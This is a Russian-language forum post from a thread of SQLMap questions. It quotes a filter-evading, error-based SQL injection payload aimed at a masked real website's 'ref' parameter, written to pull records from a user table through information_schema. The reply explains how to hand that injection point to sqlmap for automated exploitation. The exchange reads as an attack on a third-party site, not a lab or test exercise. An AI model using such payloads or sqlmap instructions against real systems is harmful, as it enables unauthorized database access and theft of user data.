Тема
:
Вопросы по SQLMap
Показать сообщение отдельно
#
7
24.05.2017, 14:37
RWD
Участник форума
Регистрация: 25.04.2013
Сообщений: 153
Провел на форуме:
56255
Репутация:
2
Цитата:
Сообщение от
MrBa
↑
Подскажите плиз. Есть уязвимость в виде -
http://www.=======.com/index.php?ref=shavez'+and(/**/sElEcT+1+/**/fRoM(/**/sElEcT+count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT+/**/cOnCaT(0x217e21,ifnull(bonusclaims,char(32)),0x217 e21)+/**/fRoM+twodolla_two.user+/**/lImIt+678,1))+/**/fRoM+information_schema./**/tAbLeS+/**/lImIt+0,1),floor(rand(0)*2))x+/**/fRoM+information_schema./**/tAbLeS+/**/gRoUp/**/bY+x)a)+and+'1'='1
как это можно вставить в sqlmap?
укажи на уязвимый параметр, с скульмапе это символ *
к примеру
id=12312*
page/2*
то что ты скинул, это тупо вывод пентеста сканера.
-
http://www.=======.com/index.php?ref=shavez*
или -
http://www.=======.com/index.php?ref=shavez
-p ref
RWD
Посмотреть профиль
Репутация
Найти все сообщения от RWD
Добавить в друзья
